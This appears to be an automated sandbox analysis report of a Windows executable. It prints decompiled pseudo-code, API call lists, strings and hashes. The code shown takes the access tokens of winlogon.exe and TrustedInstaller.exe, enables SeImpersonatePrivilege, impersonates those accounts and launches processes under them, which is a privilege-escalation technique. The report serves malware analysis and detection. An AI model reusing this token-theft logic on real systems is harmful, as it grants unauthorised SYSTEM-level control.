									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                0x00401fe6
                                                                                                                0x00401ff1
                                                                                                                0x00401ff3
                                                                                                                0x00401fff
                                                                                                                0x00402002
                                                                                                                0x004020a8
                                                                                                                0x004020ab
                                                                                                                0x004020f3
                                                                                                                0x004020f6
                                                                                                                0x00402162
                                                                                                                0x00402165
                                                                                                                0x004021f2
                                                                                                                0x004021f5
                                                                                                                0x00402235
                                                                                                                0x00402238
                                                                                                                0x004022be
                                                                                                                0x0040223a
                                                                                                                0x0040223a
                                                                                                                0x00402240
                                                                                                                0x0040224b
                                                                                                                0x0040224e
                                                                                                                0x00402251
                                                                                                                0x00402254
                                                                                                                0x00402259
                                                                                                                0x0040225e
                                                                                                                0x00402262
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402262
                                                                                                                0x00402266
                                                                                                                0x0040226c
                                                                                                                0x00402271
                                                                                                                0x00402274
                                                                                                                0x00402276
                                                                                                                0x0040229a
                                                                                                                0x0040229a
                                                                                                                0x00402278
                                                                                                                0x00402296
                                                                                                                0x00402296
                                                                                                                0x0040229c
                                                                                                                0x0040229c
                                                                                                                0x004022c0
                                                                                                                0x004022c2
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x00000000
                                                                                                                0x004022c0
                                                                                                                0x00402201
                                                                                                                0x00402203
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402220
                                                                                                                0x00402225
                                                                                                                0x00402227
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00402173
                                                                                                                0x00402179
                                                                                                                0x0040217b
                                                                                                                0x0040217e
                                                                                                                0x00402183
                                                                                                                0x00402185
                                                                                                                0x00402188
                                                                                                                0x0040218d
                                                                                                                0x0040218f
                                                                                                                0x00402192
                                                                                                                0x004021a2
                                                                                                                0x004021a7
                                                                                                                0x004021a9
                                                                                                                0x004021ac
                                                                                                                0x004021cc
                                                                                                                0x004021d1
                                                                                                                0x004021d3
                                                                                                                0x004021db
                                                                                                                0x004021db
                                                                                                                0x004021e1
                                                                                                                0x004021e1
                                                                                                                0x004021e7
                                                                                                                0x004021e7
                                                                                                                0x00000000
                                                                                                                0x00402192
                                                                                                                0x004020fe
                                                                                                                0x00402103
                                                                                                                0x00402105
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402111
                                                                                                                0x00402114
                                                                                                                0x00000000
                                                                                                                0x00402114
                                                                                                                0x004020ad
                                                                                                                0x004020b4
                                                                                                                0x004020b9
                                                                                                                0x004020bc
                                                                                                                0x00000000
                                                                                                                0x004020c2
                                                                                                                0x004020c4
                                                                                                                0x004020ce
                                                                                                                0x004020d0
                                                                                                                0x004020d3
                                                                                                                0x004020d4
                                                                                                                0x004020d5
                                                                                                                0x004020e6
                                                                                                                0x004020e7
                                                                                                                0x004020d7
                                                                                                                0x004020d7
                                                                                                                0x004020dd
                                                                                                                0x004020de
                                                                                                                0x004020df
                                                                                                                0x004020df
                                                                                                                0x004020ec
                                                                                                                0x004020ef
                                                                                                                0x00000000
                                                                                                                0x004020ef
                                                                                                                0x00402008
                                                                                                                0x00402016
                                                                                                                0x0040201d
                                                                                                                0x0040202e
                                                                                                                0x00402035
                                                                                                                0x00402044
                                                                                                                0x00402049
                                                                                                                0x00402055
                                                                                                                0x00402064
                                                                                                                0x00402068
                                                                                                                0x0040206e
                                                                                                                0x0040208b
                                                                                                                0x00402070
                                                                                                                0x00402082
                                                                                                                0x00402088
                                                                                                                0x0040209e
                                                                                                                0x004020a1
                                                                                                                0x00402119
                                                                                                                0x00402119
                                                                                                                0x0040211b
                                                                                                                0x0040211e
                                                                                                                0x0040211e
                                                                                                                0x00402149
                                                                                                                0x00402151
                                                                                                                0x00402151
                                                                                                                0x00402157
                                                                                                                0x00402157
                                                                                                                0x004022cb
                                                                                                                0x004022d2
                                                                                                                0x004022d2

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                0x00409924
                                                                                                                0x0040992c
                                                                                                                0x00409937
                                                                                                                0x0040993f
                                                                                                                0x0040994a
                                                                                                                0x00409956
                                                                                                                0x00409962
                                                                                                                0x0040996e
                                                                                                                0x00409971
                                                                                                                0x00409973
                                                                                                                0x00000000
                                                                                                                0x00409976
                                                                                                                0x00409977

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                0x00401f04
                                                                                                                0x00401f20
                                                                                                                0x00401f27
                                                                                                                0x00401f38
                                                                                                                0x00401f3f
                                                                                                                0x00401f4e
                                                                                                                0x00401f54
                                                                                                                0x00401f5f
                                                                                                                0x00401f6e
                                                                                                                0x00401f72
                                                                                                                0x00401f77
                                                                                                                0x00401f78
                                                                                                                0x00401f91
                                                                                                                0x00401f7a
                                                                                                                0x00401f88
                                                                                                                0x00401f8e
                                                                                                                0x00401f8e
                                                                                                                0x00401fa6
                                                                                                                0x00401fa9
                                                                                                                0x00401fae
                                                                                                                0x00401fb0
                                                                                                                0x00401fb2
                                                                                                                0x00401fb9
                                                                                                                0x00401fc2
                                                                                                                0x00401fca
                                                                                                                0x00401fd2
                                                                                                                0x00401fd2
                                                                                                                0x00401fd7
                                                                                                                0x00401fd7
                                                                                                                0x00401fe3

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                0x0040955f
                                                                                                                0x00409566
                                                                                                                0x0040956e
                                                                                                                0x00409576
                                                                                                                0x00409586
                                                                                                                0x00409586
                                                                                                                0x0040956e
                                                                                                                0x00409592
                                                                                                                0x004095aa
                                                                                                                0x00409594
                                                                                                                0x004095a3
                                                                                                                0x004095a6
                                                                                                                0x004095a6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                0x00402f3a
                                                                                                                0x00402f51
                                                                                                                0x00402f60
                                                                                                                0x00402f6f
                                                                                                                0x00402f78
                                                                                                                0x00402f7a
                                                                                                                0x00402f7a
                                                                                                                0x00402f8a
                                                                                                                0x00402f8f
                                                                                                                0x00402f94
                                                                                                                0x00402f99
                                                                                                                0x00402f9e
                                                                                                                0x00402f9f
                                                                                                                0x00402fad
                                                                                                                0x00402fb2
                                                                                                                0x00402fb2
                                                                                                                0x00402fbd
                                                                                                                0x00402fc5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                0x00409ddc
                                                                                                                0x00409de4
                                                                                                                0x00409df0
                                                                                                                0x00409df5
                                                                                                                0x00409df6
                                                                                                                0x00409e03
                                                                                                                0x00409e05
                                                                                                                0x00409e06
                                                                                                                0x00409e3b
                                                                                                                0x00409e5d
                                                                                                                0x00409e6a
                                                                                                                0x00409e73
                                                                                                                0x00409e75
                                                                                                                0x00409e08
                                                                                                                0x00409e08
                                                                                                                0x00409e19
                                                                                                                0x00409e37
                                                                                                                0x00409e37
                                                                                                                0x00409e81

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
